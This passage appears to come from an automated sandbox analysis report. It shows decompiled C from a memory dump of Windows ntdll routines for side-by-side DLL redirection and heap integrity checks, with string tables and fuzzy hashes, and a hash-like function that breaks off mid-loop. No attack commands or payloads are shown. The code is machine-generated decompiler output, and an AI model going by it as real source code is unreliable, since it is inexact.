                                                                                                                                                    												}
                                                                                                                                                    												goto L83;
                                                                                                                                                    											}
                                                                                                                                                    											L43:
                                                                                                                                                    											_t245 = _v88;
                                                                                                                                                    											__eflags = _t245;
                                                                                                                                                    											if(_t245 != 0) {
                                                                                                                                                    												 *_t245 =  *_t245 | 0x00000002;
                                                                                                                                                    											}
                                                                                                                                                    											goto L44;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags = _t232 & 0x00000008;
                                                                                                                                                    										if((_t232 & 0x00000008) != 0) {
                                                                                                                                                    											_t283 = L0092FBD7(1,  &_v68, 0x95b024,  &_v56);
                                                                                                                                                    											__eflags = _t283;
                                                                                                                                                    											if(_t283 >= 0) {
                                                                                                                                                    												_v68 = _v68 + 0xfffe - _v56;
                                                                                                                                                    												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                    												goto L37;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags = _t283 - 0xc0000225;
                                                                                                                                                    											if(_t283 != 0xc0000225) {
                                                                                                                                                    												goto L2;
                                                                                                                                                    											}
                                                                                                                                                    											_push("Status != STATUS_NOT_FOUND");
                                                                                                                                                    											_push(0x472);
                                                                                                                                                    											L74:
                                                                                                                                                    											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
                                                                                                                                                    											_push("Internal error check failed");
                                                                                                                                                    											E009B77A7(_t303, _t341);
                                                                                                                                                    											_t283 = 0xc00000e5;
                                                                                                                                                    											goto L2;
                                                                                                                                                    										}
                                                                                                                                                    										L37:
                                                                                                                                                    										_t254 = _v68 & 0x0000ffff;
                                                                                                                                                    										 *_t345 =  *_t345 + _t254;
                                                                                                                                                    										__eflags =  *_t345 - 0xffff;
                                                                                                                                                    										if( *_t345 >= 0xffff) {
                                                                                                                                                    											goto L76;
                                                                                                                                                    										}
                                                                                                                                                    										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
                                                                                                                                                    										__eflags = _t255 - 0xfffe;
                                                                                                                                                    										if(_t255 > 0xfffe) {
                                                                                                                                                    											goto L76;
                                                                                                                                                    										}
                                                                                                                                                    										_t287 =  &(_t347[4]);
                                                                                                                                                    										__eflags = _t287;
                                                                                                                                                    										if(_t287 == 0) {
                                                                                                                                                    											L77:
                                                                                                                                                    											_t256 = E009578E5(0, _t287, _t255);
                                                                                                                                                    											__eflags = _t256;
                                                                                                                                                    											if(_t256 >= 0) {
                                                                                                                                                    												L41:
                                                                                                                                                    												_t347[2] =  *_t287;
                                                                                                                                                    												E00938980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
                                                                                                                                                    												_t260 = _v68;
                                                                                                                                                    												 *_t347 =  *_t347 + _t260;
                                                                                                                                                    												_t347[1] =  *_t347 + _t260 + 2;
                                                                                                                                                    												_t350 = _t350 + 0xc;
                                                                                                                                                    												_t341 = 0;
                                                                                                                                                    												__eflags = 0;
                                                                                                                                                    												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    												goto L42;
                                                                                                                                                    											}
                                                                                                                                                    											goto L61;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags = _t255 - _t347[8];
                                                                                                                                                    										if(_t255 > _t347[8]) {
                                                                                                                                                    											goto L77;
                                                                                                                                                    										}
                                                                                                                                                    										goto L41;
                                                                                                                                                    									}
                                                                                                                                                    									 *_t347 = 0;
                                                                                                                                                    									_t266 = ( *_t303 & 0x0000ffff) + 2;
                                                                                                                                                    									__eflags = _t266 - 0xfffe;
                                                                                                                                                    									if(_t266 > 0xfffe) {
                                                                                                                                                    										goto L76;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t345;
                                                                                                                                                    									if(_t345 == 0) {
                                                                                                                                                    										L63:
                                                                                                                                                    										_t267 = E009578E5(0, _t345, _t266);
                                                                                                                                                    										__eflags = _t267;
                                                                                                                                                    										if(_t267 < 0) {
                                                                                                                                                    											goto L61;
                                                                                                                                                    										}
                                                                                                                                                    										_t303 = _v60;
                                                                                                                                                    										L33:
                                                                                                                                                    										_t347[2] =  *_t345;
                                                                                                                                                    										E00938980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                                                                                                                                    										_t271 = _v60;
                                                                                                                                                    										_t350 = _t350 + 0xc;
                                                                                                                                                    										_t347[1] =  *_t347 +  *_t271 + 2;
                                                                                                                                                    										 *_t347 =  *_t347 +  *_t271;
                                                                                                                                                    										_t303 = _t347[2];
                                                                                                                                                    										_t341 = 0;
                                                                                                                                                    										__eflags = 0;
                                                                                                                                                    										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    										goto L34;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t266 - _t347[8];
                                                                                                                                                    									if(_t266 > _t347[8]) {
                                                                                                                                                    										goto L63;
                                                                                                                                                    									}
                                                                                                                                                    									goto L33;
                                                                                                                                                    								}
                                                                                                                                                    								L61:
                                                                                                                                                    								_t283 = 0xc0000017;
                                                                                                                                                    								goto L2;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t214 - _t347[8];
                                                                                                                                                    							if(_t214 > _t347[8]) {
                                                                                                                                                    								goto L60;
                                                                                                                                                    							}
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t303 = 0;
                                                                                                                                                    					_v48 = 0;
                                                                                                                                                    					__eflags = _t207 & 0x00000004;
                                                                                                                                                    					if((_t207 & 0x00000004) != 0) {
                                                                                                                                                    						_push("sxsisol_SearchActCtxForDllName");
                                                                                                                                                    						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
                                                                                                                                                    						L00973F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v116 & 0x00000001;
                                                                                                                                                    					if((_v116 & 0x00000001) != 0) {
                                                                                                                                                    						__eflags = _v116 & 0x00000002;
                                                                                                                                                    						if((_v116 & 0x00000002) != 0) {
                                                                                                                                                    							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
                                                                                                                                                    							_push(0x416);
                                                                                                                                                    							goto L74;
                                                                                                                                                    						}
                                                                                                                                                    						_t303 = 1;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v116 & 0x00000002;
                                                                                                                                                    					if((_v116 & 0x00000002) != 0) {
                                                                                                                                                    						_t303 = _t303 | 0x00000002;
                                                                                                                                                    					}
                                                                                                                                                    					_t283 = E0094C507(_t303, _v124, _v120,  &_v60, 0x94cdad,  &_v48);
                                                                                                                                                    					__eflags = _t283;
                                                                                                                                                    					if(_t283 < 0) {
                                                                                                                                                    						__eflags = _t283 - 0xc0000120;
                                                                                                                                                    						if(_t283 == 0xc0000120) {
                                                                                                                                                    							__eflags = _v48;
                                                                                                                                                    							if(_v48 < 0) {
                                                                                                                                                    								_t283 = _v48;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L2;
                                                                                                                                                    					} else {
                                                                                                                                                    						goto L22;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				if(_t283 == 0xc0150001) {
                                                                                                                                                    					_t283 = _t283 + 7;
                                                                                                                                                    				}
                                                                                                                                                    				goto L2;
                                                                                                                                                    			}
                                                                                                                                                    0x0094c322
                                                                                                                                                    0x0094c325
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c32b
                                                                                                                                                    0x0094c32e
                                                                                                                                                    0x0094c331
                                                                                                                                                    0x0094c333
                                                                                                                                                    0x0094c335
                                                                                                                                                    0x0094c37b
                                                                                                                                                    0x0094c383
                                                                                                                                                    0x0094c386
                                                                                                                                                    0x0094c388
                                                                                                                                                    0x0094c38a
                                                                                                                                                    0x0094c38c
                                                                                                                                                    0x0094c38f
                                                                                                                                                    0x0094c391
                                                                                                                                                    0x0094c391
                                                                                                                                                    0x0094c394
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c35
                                                                                                                                                    0x00983c39
                                                                                                                                                    0x00983c3b
                                                                                                                                                    0x00983c3e
                                                                                                                                                    0x00983c41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c4a
                                                                                                                                                    0x00983c4d
                                                                                                                                                    0x00983c4f
                                                                                                                                                    0x00983c51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c5c
                                                                                                                                                    0x00983c5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983c68
                                                                                                                                                    0x00983c6d
                                                                                                                                                    0x00983c6e
                                                                                                                                                    0x00983c6e
                                                                                                                                                    0x0094c39a
                                                                                                                                                    0x0094c39d
                                                                                                                                                    0x0094c39f
                                                                                                                                                    0x0094c3a4
                                                                                                                                                    0x0094c3a4
                                                                                                                                                    0x0094c3a4
                                                                                                                                                    0x0094c3a9
                                                                                                                                                    0x0094c3ac
                                                                                                                                                    0x0094c3b1
                                                                                                                                                    0x00983dae
                                                                                                                                                    0x00983dae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c3b7
                                                                                                                                                    0x0094c3b7
                                                                                                                                                    0x0094c3ba
                                                                                                                                                    0x0094c3bc
                                                                                                                                                    0x00983c76
                                                                                                                                                    0x00983c7a
                                                                                                                                                    0x00983c7f
                                                                                                                                                    0x00983c81
                                                                                                                                                    0x00983c8d
                                                                                                                                                    0x0094c3cb
                                                                                                                                                    0x0094c3cd
                                                                                                                                                    0x0094c3d4
                                                                                                                                                    0x0094c3d8
                                                                                                                                                    0x0094c3da
                                                                                                                                                    0x0094c445
                                                                                                                                                    0x0094c445
                                                                                                                                                    0x0094c449
                                                                                                                                                    0x0094c44d
                                                                                                                                                    0x00983caa
                                                                                                                                                    0x00983cad
                                                                                                                                                    0x00983cb0
                                                                                                                                                    0x00983cb8
                                                                                                                                                    0x00983cbe
                                                                                                                                                    0x00983cc5
                                                                                                                                                    0x00983cc9
                                                                                                                                                    0x00983cce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983cd7
                                                                                                                                                    0x00983cd9
                                                                                                                                                    0x00983ce0
                                                                                                                                                    0x00983ce7
                                                                                                                                                    0x00983cec
                                                                                                                                                    0x00983cee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983cf0
                                                                                                                                                    0x00983cfd
                                                                                                                                                    0x00983d05
                                                                                                                                                    0x00983d0d
                                                                                                                                                    0x00983d11
                                                                                                                                                    0x00983d20
                                                                                                                                                    0x00983d24
                                                                                                                                                    0x00983d27
                                                                                                                                                    0x00983d29
                                                                                                                                                    0x00983d2c
                                                                                                                                                    0x00983d2f
                                                                                                                                                    0x00983d36
                                                                                                                                                    0x00983d39
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983d3f
                                                                                                                                                    0x00983cdb
                                                                                                                                                    0x00983cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983caa
                                                                                                                                                    0x0094c453
                                                                                                                                                    0x0094c456
                                                                                                                                                    0x0094c458
                                                                                                                                                    0x0094c45b
                                                                                                                                                    0x0094c45d
                                                                                                                                                    0x0094c4e4
                                                                                                                                                    0x0094c4e7
                                                                                                                                                    0x0094c4ea
                                                                                                                                                    0x00983dce
                                                                                                                                                    0x00983dd3
                                                                                                                                                    0x00983dda
                                                                                                                                                    0x00983ddc
                                                                                                                                                    0x00983dde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983de6
                                                                                                                                                    0x00983ded
                                                                                                                                                    0x00983df0
                                                                                                                                                    0x00983df5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983df7
                                                                                                                                                    0x00983dfa
                                                                                                                                                    0x00983dfc
                                                                                                                                                    0x00983e03
                                                                                                                                                    0x00983e07
                                                                                                                                                    0x00983e0c
                                                                                                                                                    0x00983e0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983e14
                                                                                                                                                    0x00983e23
                                                                                                                                                    0x00983e2a
                                                                                                                                                    0x00983e32
                                                                                                                                                    0x00983e36
                                                                                                                                                    0x00983e43
                                                                                                                                                    0x00983e4f
                                                                                                                                                    0x00983e51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983e51
                                                                                                                                                    0x00983dfe
                                                                                                                                                    0x00983e01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00983e01
                                                                                                                                                    0x0094c4f0
                                                                                                                                                    0x0094c4f0
                                                                                                                                                    0x0094c4f3
                                                                                                                                                    0x0094c4f5
                                                                                                                                                    0x00983e5a
                                                                                                                                                    0x00983e5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0094c4f5
                                                                                                                                                    0x0094c463
                                                                                                                                                    0x0094c465
                                                                                                                                                    0x00983d58
                                                                                                                                                    0x00983d5a
                                                                                                                                                    0x00983d5c
                                                                                                                                                    0x00983d98
                                                                                                                                                    0x00983da6

                                                                                                                                                    Strings
                                                                                                                                                    • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00983BDF
                                                                                                                                                    • @, xrefs: 0092F3FE
                                                                                                                                                    • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00983D74
                                                                                                                                                    • Internal error check failed, xrefs: 00983D79
                                                                                                                                                    • sxsisol_SearchActCtxForDllName, xrefs: 00983BCE
                                                                                                                                                    • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00983C08
                                                                                                                                                    • Status != STATUS_NOT_FOUND, xrefs: 00983D6A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                    • API String ID: 0-4103935307
                                                                                                                                                    • Opcode ID: 1cdcd270c878460d6a08f1331f9b5449190e508a7837271c4389daf618d6d2b7
                                                                                                                                                    • Instruction ID: ab15dbd53f79c82b2e52631e5a81851df91552bb00e20355637fc87974600210
                                                                                                                                                    • Opcode Fuzzy Hash: 1cdcd270c878460d6a08f1331f9b5449190e508a7837271c4389daf618d6d2b7
                                                                                                                                                    • Instruction Fuzzy Hash: C4029B70A00219DFDB24DFA9C991ABEB7F4FF48704F20842DE986AB291E7749945CB10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 0097DABE
                                                                                                                                                    • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 0097DBA6
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0097DAA6, 0097DB8E
                                                                                                                                                    • HEAP: , xrefs: 0097DAB3, 0097DB9B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                    • API String ID: 0-1657114761
                                                                                                                                                    • Opcode ID: 3ec3452b22480b9639a0ce85fabbe5f12dc4206a65be7abbfc6438980bd80f25
                                                                                                                                                    • Instruction ID: 50d39725d66f6c93a1a17f16060f6359356c16645f911cca0438c3e17c87335b
                                                                                                                                                    • Opcode Fuzzy Hash: 3ec3452b22480b9639a0ce85fabbe5f12dc4206a65be7abbfc6438980bd80f25
                                                                                                                                                    • Instruction Fuzzy Hash: FB02A9B1608646CFDB28CF98C494B7AB7F5FF44304F298569E8868B291D734E941DF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0098A4AC
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0098A48B
                                                                                                                                                    • HEAP: , xrefs: 0098A498
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP: Free Heap block %lx modified at %lx after it was freed, xrefs: 0098ACD9
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0098ACB5
                                                                                                                                                    • HEAP: , xrefs: 0098ACC2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 0098DC0F
                                                                                                                                                    • Unable to release memory at %p for %p bytes - Status == %x, xrefs: 0098DC30
                                                                                                                                                    • HEAP: , xrefs: 0098DC1C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %p bytes - Status == %x
                                                                                                                                                    • API String ID: 0-212623055
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %lx modified at %lx after it was freed$HEAP[%wZ]:
                                                                                                                                                    • API String ID: 0-2419525547
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00989616
                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x), xrefs: 00989636
                                                                                                                                                    • HEAP: , xrefs: 00989623
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %x)
                                                                                                                                                    • API String ID: 0-385592399
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 00992D07
                                                                                                                                                    • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00992D1F
                                                                                                                                                    • HEAP: , xrefs: 00992D14
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                    • API String ID: 0-1596344177
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • HEAP[%wZ]: , xrefs: 009B58D7
                                                                                                                                                    • HEAP: , xrefs: 009B58E4
                                                                                                                                                    • Heap block at %p modified at %p past requested size of %lx, xrefs: 009B58F7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                                                                                                                    • API String ID: 0-3722492067
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-3916222277
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                    			E00408C70(signed int* _a4) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				char _v304;
                                                                                                                                                    				signed char* _t277;
                                                                                                                                                    				signed int* _t278;
                                                                                                                                                    				signed int _t279;
                                                                                                                                                    				signed int _t285;
                                                                                                                                                    				signed int _t288;
                                                                                                                                                    				signed int _t292;
                                                                                                                                                    				signed int _t295;
                                                                                                                                                    				signed int _t299;
                                                                                                                                                    				signed int _t303;
                                                                                                                                                    				signed int _t305;
                                                                                                                                                    				signed int _t311;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				signed int _t320;
                                                                                                                                                    				signed int _t323;
                                                                                                                                                    				signed int _t325;
                                                                                                                                                    				signed int _t334;
                                                                                                                                                    				signed int _t340;
                                                                                                                                                    				signed int _t341;
                                                                                                                                                    				signed int _t346;
                                                                                                                                                    				signed int _t353;
                                                                                                                                                    				signed int _t357;
                                                                                                                                                    				signed int _t358;
                                                                                                                                                    				signed int _t362;
                                                                                                                                                    				signed int _t365;
                                                                                                                                                    				signed int _t369;
                                                                                                                                                    				signed int _t370;
                                                                                                                                                    				signed int _t399;
                                                                                                                                                    				signed int _t404;
                                                                                                                                                    				signed int _t410;
                                                                                                                                                    				signed int _t413;
                                                                                                                                                    				signed int _t420;
                                                                                                                                                    				signed int _t423;
                                                                                                                                                    				signed int _t432;
                                                                                                                                                    				signed int _t434;
                                                                                                                                                    				signed int _t437;
                                                                                                                                                    				signed int _t445;
                                                                                                                                                    				signed int _t459;
                                                                                                                                                    				signed int _t462;
                                                                                                                                                    				signed int _t463;
                                                                                                                                                    				signed int _t464;
                                                                                                                                                    				signed int _t470;
                                                                                                                                                    				signed int _t478;
                                                                                                                                                    				signed int _t479;
                                                                                                                                                    				signed int* _t480;
                                                                                                                                                    				signed int* _t481;
                                                                                                                                                    				signed int _t488;
                                                                                                                                                    				signed int _t491;
                                                                                                                                                    				signed int _t496;
                                                                                                                                                    				signed int _t499;
                                                                                                                                                    				signed int _t502;
                                                                                                                                                    				signed int _t505;
                                                                                                                                                    				signed int _t506;
                                                                                                                                                    				signed int _t510;
                                                                                                                                                    				signed int _t522;
                                                                                                                                                    				signed int _t525;
                                                                                                                                                    				signed int _t532;
                                                                                                                                                    				void* _t536;
                                                                                                                                                    
                                                                                                                                                    				_t481 = _a4;
                                                                                                                                                    				_t353 = 0;
                                                                                                                                                    				_t2 =  &(_t481[7]); // 0x1b
                                                                                                                                                    				_t277 = _t2;
                                                                                                                                                    				do {
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                                                                                                                                                    					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                                                                                                                                                    					_t353 = _t353 + 4;
                                                                                                                                                    					_t277 =  &(_t277[0x10]);
                                                                                                                                                    				} while (_t353 < 0x10);
                                                                                                                                                    				_t278 =  &_v304;
                                                                                                                                                    				_v8 = 0x10;
                                                                                                                                                    				do {
                                                                                                                                                    					_t399 =  *(_t278 - 0x18);
                                                                                                                                                    					_t459 =  *(_t278 - 0x14);
                                                                                                                                                    					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                                                                                                                                                    					asm("rol ecx, 1");
                                                                                                                                                    					asm("rol ebx, 1");
                                                                                                                                                    					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                                                                                                                                                    					_t278[8] = _t357;
                                                                                                                                                    					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                                                                                                                                                    					_t278 =  &(_t278[4]);
                                                                                                                                                    					asm("rol ebx, 1");
                                                                                                                                                    					asm("rol edx, 1");
                                                                                                                                                    					_t46 =  &_v8;
                                                                                                                                                    					 *_t46 = _v8 - 1;
                                                                                                                                                    					_t278[6] = _t318 ^ _t399;
